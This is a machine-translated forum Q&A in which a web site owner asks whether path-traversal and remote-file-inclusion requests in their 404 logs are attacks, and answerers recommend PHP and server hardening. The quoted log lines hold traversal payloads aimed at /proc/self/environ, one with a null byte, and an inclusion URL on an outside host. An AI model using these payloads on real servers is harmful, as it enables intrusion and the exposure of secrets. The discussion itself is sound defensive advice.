这是一次黑客攻击吗?

这是一次黑客攻击吗?

查看我的 404 日志,我注意到以下两个 URL 都出现过一次:

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

有问题的页面library.php需要一个type具有六个不同可接受值的变量,然后是一个id变量。因此,有效的 URL 可能是

library.php?type=Circle-K&id=Strange-Things-Are-Afoot

mysql_real_escape_string并且在用于查询数据库之前所有 ID 都会被运行一遍。

我是新手,但在我看来,这两个链接都是针对 webroot 的简单攻击?

1)除了 404 之外,如何最好地防止这些事情发生?

2)我是否应该永久禁止负责的 IP?

编辑:也刚刚注意到这个

/library.php=http://www.basfalt.no/scripts/danger.txt

编辑2:这 3 次攻击的攻击 IP 均可以216.97.231.15追溯到位于洛杉矶郊外的一家名为 Lunar Pages 的 ISP。

编辑3:我决定在当地时间周五早上给 ISP 打电话,与能接通电话的任何人讨论这个问题。我会在 24 小时左右在这里发布结果。

编辑4:我最终给他们的管理员发了一封电子邮件,他们首先回复说“他们正在调查此事”,然后一天后又回复说“这个问题现在应该解决了。”遗憾的是,没有进一步的细节。

答案1

0) 是的。至少,这是对你的网站进行的系统探测,试图发现它是否存在漏洞。

1) 除了确保代码干净之外,您能做的不多,只能对主机运行自己的测试以确保其安全。Google Skipfish 是众多可帮助您的工具之一。

2)我愿意。

答案2

这是一次攻击,这很好解释这里

答案3

正如其他人所说:是的,这是一次黑客攻击。请注意,除了这种可能的人为攻击之外,僵尸网络还运行着大量自动攻击。通常,这些攻击试图利用古老的漏洞和/或一些典型的编码缺陷,例如无法验证用户输入导致 SQL 注入、系统或文件泄漏等。

手动禁止这些僵尸网络很可能是不可能的,因为僵尸网络可以使用多达数千个唯一的 IP 地址,所以如果您想禁止它们,您将不得不使用某种自动禁止程序。失败2ban我想到的是;让它对 mod_security 事件或一些其他日志条目做出反应。

如果您的代码干净且服务器经过强化,那么这些黑客攻击只会造成令人讨厌的日志污染。但最好采取预防措施,并根据您的需要考虑以下部分或全部措施:

  • mod_security是一个 Apache 模块,用于过滤所有类型的典型黑客攻击。如果发现可疑的 JavaScript 等,它还可以限制出站流量(您的服务器将发送给客户端的页面)。

  • 苏霍辛用于强化 PHP 本身。

  • 以拥有脚本的用户身份运行 PHP 脚本;例如苏phpphp-fpm使之成为可能。

  • 将您的 webroot 和 PHP 临时目录挂载为noexec,nosuid,nodev

  • 禁用不需要的 PHP 函数,例如系统直通

  • 禁用不需要的 PHP 模块。例如,如果您不需要 IMAP 支持,请不要启用它。

  • 保持你的服务器为最新状态。

  • 留意日志。

  • 确保您有备份。

  • 制定一个计划,以防有人攻击您或遇到其他灾难时该怎么做。

这是个好的开始。然后还有更极端的措施,例如呼噜序幕,但对于大多数设置来说,它们可能会过于强大。

答案4

正如已经说过的 - 这是尝试访问 /proc/self/environ 文件以获取更多信息。

我假设它是一台 Linux 机器:

你应该使用

你可以阻止攻击服务器的 IP,但你应该考虑到它在功能上可能不具有攻击性。

当我的服务器受到攻击时,我曾经阻止一些服务:http / https / pop / imap / ssh但保持 smtp 开放,这样如果您犯了错误,您就可以收到通知。

相关内容